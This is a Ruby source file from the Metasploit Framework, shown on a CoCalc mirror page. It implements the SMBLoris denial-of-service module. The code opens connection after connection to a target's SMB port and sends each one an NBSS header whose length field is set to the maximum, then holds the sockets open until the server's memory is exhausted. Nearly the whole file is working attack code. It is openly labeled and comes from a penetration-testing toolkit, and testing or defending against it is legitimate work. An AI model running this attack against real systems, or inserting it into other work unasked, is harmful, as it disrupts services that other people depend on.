CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/smb/smb_loris.rb
Views: 1904
1
#!/usr/bin/env ruby

2


3
require 'socket'

4
require 'metasploit'

5


6
require 'bindata'

7


8
class NbssHeader < BinData::Record

9
  endian  :little

10
  uint8   :message_type

11
  bit7    :flags

12
  bit17   :message_length

13
end

14


15
metadata = {

16
  name: 'SMBLoris NBSS Denial of Service',

17
  description: %q{

18
    The SMBLoris attack consumes large chunks of memory in the target by sending

19
    SMB requests with the NetBios Session Service(NBSS) Length Header value set

20
    to the maximum possible value. By keeping these connections open and initiating

21
    large numbers of these sessions, the memory does not get freed, and the server

22
    grinds to a halt. This vulnerability was originally disclosed by Sean Dillon

23
    and Zach Harding.

24


25
    DISCALIMER: This module opens a lot of simultaneous connections. Please check

26
    your system's ULIMIT to make sure it can handle it. This module will also run

27
    continuously until stopped.

28
  },

29
  authors: [

30
      'thelightcosine',

31
      'Adam Cammack <adam_cammack[at]rapid7.com>'

32
  ],

33
  date: '2017-06-29',

34
  references: [

35
    { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },

36
    { type: 'aka', ref: 'SMBLoris'}

37
  ],

38
  type: 'dos',

39
  options: {

40
    rhost: {type: 'address', description: 'The target address', required: true, default: nil},

41
    rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},

42
  }

43
}

44


45
def run(args)

46
  header = NbssHeader.new

47
  header.message_length = 0x01FFFF

48


49
  last_reported = 0

50
  warned = false

51
  n_loops = 0

52
  sockets = []

53


54
  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)

55


56
  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "

57


58
  while true do

59
    begin

60
      sockets.delete_if do |s|

61
        s.closed?

62
      end

63


64
      nsock = target.connect(timeout: 360)

65
      nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)

66
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))

67
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))

68
      nsock.setsockopt(Socket::Option.linger(true, 60))

69
      nsock.write(header.to_binary_s)

70
      sockets << nsock

71


72
      n_loops += 1

73
      if  last_reported != sockets.length

74
        if n_loops % 100 == 0

75
          last_reported = sockets.length

76
          Metasploit.log "#{sockets.length} socket(s) open", level: 'info'

77
        end

78
      elsif n_loops % 1000 == 0

79
        Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'

80
      end

81
    rescue Interrupt

82
      break

83
      sockets.each &:close

84
    rescue Errno::EMFILE

85
      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned

86
      warned = true

87
      sockets.slice(0).close

88
    rescue Exception => e

89
      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'

90
    end

91
  end

92
end

93


94
if __FILE__ == $PROGRAM_NAME

95
  Metasploit.run(metadata, method(:run))

96
end

97


98